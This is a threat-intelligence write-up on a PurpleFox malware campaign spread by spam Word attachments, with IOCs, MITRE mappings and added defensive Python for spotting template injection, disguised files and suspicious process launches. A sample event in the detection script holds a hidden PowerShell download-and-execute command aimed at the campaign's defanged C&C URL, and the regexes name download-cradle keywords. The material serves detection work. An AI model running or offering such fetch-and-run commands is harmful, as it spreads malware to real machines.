PurpleFox Resurfaces Via Spam Emails: A Look Into Its Recent Campaign – Cyble

Cyble’s CRIL analyzes a PurpleFox campaign delivered via spam emails carrying Word attachments. The documents trigger multi-stage PowerShell downloads and use steganography (a payload hidden in a PNG) to conceal the stage that fetches the final MSI dropper, which itself is served with a .jpg extension. The chain ends with deployment of the PurpleFox payload, which applies anti-detection and persistence techniques, illustrating a layered infection chain in which little beyond the lure document touches disk until the MSI stage.

Keypoints

  • Spam emails deliver a Word document attachment that initiates the infection chain.
  • A VBA macro fetches the first-stage PowerShell code from a remote file when the document is opened (one lure uses a remote template, update.dotm, to bring in the macro).
  • The first-stage PowerShell script (served as ace.jpg) downloads a PNG image (all.png) that hides the second-stage payload via steganography.
  • The second-stage PowerShell script downloads an MSI installer disguised as a JPG file; this MSI is the PurpleFox payload.
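Two of the artifacts above can be checked mechanically before any detonation: a .docx that pulls a remote template, and a download whose bytes do not match its extension (a PowerShell script and an MSI both served as .jpg). The helper below is an added example and not Cyble's code or anything recovered from the campaign; the docx it inspects is a minimal container constructed in memory, and the three byte strings stand in for the downloads rather than reproducing them. The defanged template URL is the one from the IOC list, used only as a string.

```python
"""Added triage helper (not Cyble's code). Checks for a remote attached template
in a Word file and for extension/content mismatches in downloaded artifacts.
All sample inputs are constructed in memory."""
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# Defanged template URL from the report's IOC list, used here only as a sample target.
TEMPLATE_URL = ("hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/"
                "67856eed42115b6af39ecf6bb3e66f6ed8c13287/update.dotm")

# Leading bytes for the container types that appear in this chain.
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),  # OLE2 compound file: MSI, legacy .doc
    (b"PK\x03\x04", "zip"),                          # OOXML (.docx/.dotm/.docm) is a zip
]
EXT_TO_TYPE = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "msi": "ole2",
               "doc": "ole2", "docx": "zip", "dotm": "zip", "docm": "zip"}


def sniff_type(data: bytes) -> str:
    """Identify content by magic bytes; 'unknown' covers text such as a script."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"


def extension_mismatch(filename: str, data: bytes):
    """Return (mismatch, claimed_type, actual_type) for a downloaded artifact."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_TO_TYPE.get(ext, "unknown")
    actual = sniff_type(data)
    return (claimed != actual, claimed, actual)


def remote_templates(docx_bytes: bytes) -> list:
    """Return external attachedTemplate targets from word/_rels/settings.xml.rels."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return []
        root = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
    hits = []
    for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
        if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
            hits.append(rel.get("Target"))
    return hits


def build_sample_docx(template_url: str = "") -> bytes:
    """Construct a minimal OOXML container; with a URL it mimics a template-injection lure."""
    rels = [f'<Relationships xmlns="{PKG_REL_NS}">']
    if template_url:
        rels.append(f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                    f'Target="{template_url}" TargetMode="External"/>')
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    print("remote templates:", remote_templates(build_sample_docx(TEMPLATE_URL)))
    # Constructed stand-ins for the three downloads: a script served as .jpg,
    # a genuine PNG header, and an OLE2 (MSI) header served as .jpg.
    for name, data in [("ace.jpg", b"$a = New-Object Net.WebClient"),
                       ("all.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16),
                       ("SsdxxIp8DqeQ.jpg", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\0" * 16)]:
        print(name, extension_mismatch(name, data))
```

The template check only looks at the settings relationships part, which is where Word stores the attachedTemplate link; a lure that embeds a macro directly (the .docm and .doc files in the IOC list) would not be flagged by it and needs a macro check instead. The magic-byte check deliberately reports a text script as "unknown", so a .jpg that is really PowerShell is still a mismatch even though no signature matches it.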

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The malware reaches users via spam emails carrying a malicious Word attachment.
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – The document (or the remote template it loads) contains embedded VBA macros that execute when the document is opened.
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell commands download each next-stage payload.
  • [T1543.003] Create or Modify System Process: Windows Service – Uses sc.exe to modify the status of services.
  • [T1497] Virtualization/Sandbox Evasion – VM artifact strings found in memory indicate anti-VM and anti-debug checks used for evasion.
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Scans for VM- and debugger-related processes and terminates them.
  • [T1036.008] Masquerading: Masquerade File Type – Downloads files whose content does not match their extension (a PowerShell script and an MSI both served as .jpg).
  • [T1112] Modify Registry – Uses reg.exe to modify the Windows registry.
  • [T1221] Template Injection – The sample references a remote Office document template, a technique used to conceal malicious code or force authentication attempts.
  • [T1574.010] Hijack Execution Flow: Services File Permissions Weakness – Uses cacls to modify file permissions.
  • [T1057] Process Discovery – Queries the list of running processes.
  • [T1012] Query Registry – Examines the registry to extract system details.
  • [T1082] System Information Discovery – Gathers system information through PowerShell, cmd, and WMIC.
  • [T1518.001] Software Discovery: Security Software Discovery – May try to detect a virtual machine or analysis tooling to hinder analysis (VM artifact strings found in memory).
  • [T1071] Application Layer Protocol – Communicates with the C&C server over TCP.
  • [T1105] Ingress Tool Transfer – Downloads additional files from the C&C server.
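Several of the techniques above (Office spawning PowerShell, PowerShell download cradles, sc.exe changing service state, cacls rewriting ACLs, reg.exe edits) are visible in process-creation telemetry. The sketch below is an added example and not Cyble's detection content: it runs a small rule set over Sysmon-style event fields (Image, ParentImage, CommandLine). The regexes, rule names and sample events are constructed for illustration; the command lines are plausible stand-ins, not the campaign's actual commands, and the service name, DLL and registry value in them are invented.

```python
"""Added detection sketch (not Cyble's code). Matches process-creation events
against behaviours the report attributes to PurpleFox. Regexes and sample
events are constructed, not observed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    image: str           # regex on the process image basename
    cmdline: str         # regex on the command line
    parent: str = ""     # optional regex on the parent image basename


# Assumed regexes; tune for your environment before deploying.
RULES = [
    Rule("office_spawns_powershell", "T1059.001", r"^powershell(\.exe)?$", r".",
         r"^(winword|excel|powerpnt)(\.exe)?$"),
    Rule("powershell_download_cradle", "T1105", r"^powershell(\.exe)?$",
         r"(downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b"
         r"|net\.webclient|start-bitstransfer)"),
    Rule("sc_changes_service_state", "T1543.003", r"^sc(\.exe)?$",
         r"\b(stop|start|config|delete|create)\b"),
    Rule("cacls_changes_file_acl", "T1574.010", r"^i?cacls(\.exe)?$", r"."),
    Rule("reg_modifies_registry", "T1112", r"^reg(\.exe)?$", r"\b(add|delete|import)\b"),
]


def basename(path: str) -> str:
    """Last path component, tolerating either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def match_rules(event: dict) -> list:
    """Return the names of all rules an event satisfies, in RULES order."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    for r in RULES:
        if not re.search(r.image, image, re.I):
            continue
        if not re.search(r.cmdline, cmd, re.I):
            continue
        if r.parent and not re.search(r.parent, parent, re.I):
            continue
        hits.append(r.name)
    return hits


def triage(events: list) -> list:
    """Return [(index, [rule names])] for every event that matched at least one rule."""
    out = []
    for i, e in enumerate(events):
        hits = match_rules(e)
        if hits:
            out.append((i, hits))
    return out


# Constructed sample events (Sysmon Event ID 1 style); the download URL is the
# first-stage IOC from the report, everything else is invented for the example.
ACE_URL = ("hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/"
           "37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    f".DownloadString('{ACE_URL}')\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc stop SampleSvc"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\cacls.exe",
     "CommandLine": r"cacls C:\Windows\System32\sample.dll /e /g Everyone:F"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Sample /d C:\sample.exe /f"},
    {"ParentImage": r"C:\Windows\explorer.exe",            # benign admin use: no hit
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], "->", names)
```

The cacls rule fires on any invocation because legitimate interactive use of cacls on a workstation is rare; in an environment where administrators script ACL changes it would need a parent-process or path constraint. Parent-child matching is what separates the first event from the benign PowerShell event, which is why the Office-parent rule is worth keeping even though the cradle rule alone would also catch the sample.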

Indicators of Compromise

  • [File Hashes] Invoice-891920.docx – MD5: 70e254f2a86e0a49bb319c2af0e1a2cb, SHA1: bd13ecc3f3410986996b3bc0998549875aa171d3, SHA256: 1ddc7091d5bbe8d2105be4c2341f941f04cdeaaea05b89b6ee1456843b90fb04
  • [File Hashes] ID-231396590616.docm – MD5: 8c498f9e6dd65c5a9704208922224661, SHA1: 1dc2f872c2e23e1eb0c6090909c5807553ad1e75, SHA256: 38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2
  • [File Hashes] Invoice-654931.doc – MD5: a7c5adccfeb31331edd0351c7b5fdde9, SHA1: a0fd6c29b81c629baa9c1311f177f715d6aee36f, SHA256: efe078fb3808c5b725d33df59da55aff0718534e31908280899c9859a0f2d1a8
  • [File Hashes] update.dotm – MD5: 405ddc04a06b883b12e1e152be599533, SHA1: 6c642417ba41c0c883c4f431de99513827d2858b, SHA256: d4e1cb27ce387ee1aedd8ebd69ec2f0a13e1d81bae6079061bd13f1a0a158026
  • [File Hashes] ace.jpg – MD5: def0a155618de548cc2902221d3890db, SHA1: db90e04683068fd16d5fbefbba4e7dd30adba306, SHA256: 540ba2c354ead0e80dd37fb41ae83f4ea98b52fcf2e124463b2a6d0d73bd2e05
  • [Domain] black-sun-a335.asyorfplmnv.workers.dev – C&C domain
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/67856eed42115b6af39ecf6bb3e66f6ed8c13287/update.dotm – Template injection URL
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg – 1st stage PowerShell script
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png – PNG with steganographic payload
  • [URL] hxxp://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg – PurpleFox MSI payload disguised as JPG

Read more: https://cyble.com/blog/purplefox-resurfaces-via-spam-emails-a-look-into-its-recent-campaign/